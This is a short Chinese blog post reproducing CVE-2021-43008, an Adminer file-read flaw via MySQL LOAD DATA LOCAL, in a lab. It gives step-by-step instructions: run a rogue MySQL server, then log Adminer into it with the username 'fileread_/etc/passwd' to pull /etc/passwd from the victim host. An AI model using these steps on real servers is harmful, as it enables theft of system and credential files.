type
status
date
slug
summary
tags
category
icon
password
Adminer远程文件读取(CVE-2021-43008)
Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。
在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。
漏洞环境
服务启动后,在
http://your-ip:8080即可查看到Adminer的登录页面。漏洞复现
使用
fake-mysql-server启动一个恶意的MySQL服务器。
填入
攻击机ip及开启端口,设置Mode 为File Read并设置Cmd /File 路径为/etc/passwdGenerate为jdbc:mysql://受害机IP:端口/test?user=fileread_/etc/passwd
在Adminer登录页面中填写恶意服务地址和用户名
System选择Mysql,Server填写攻击机ip:绑定端口,Username填写fileread_/etc/passwd
登录后会在攻击机的
fake-mysql-server目录下自动创建一个文件夹,在文件夹内即可看到所读取的内容
- 作者:brown
- 链接:https://bbrownn.dpdns.org//article/CVE-2021-43008
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。
相关文章











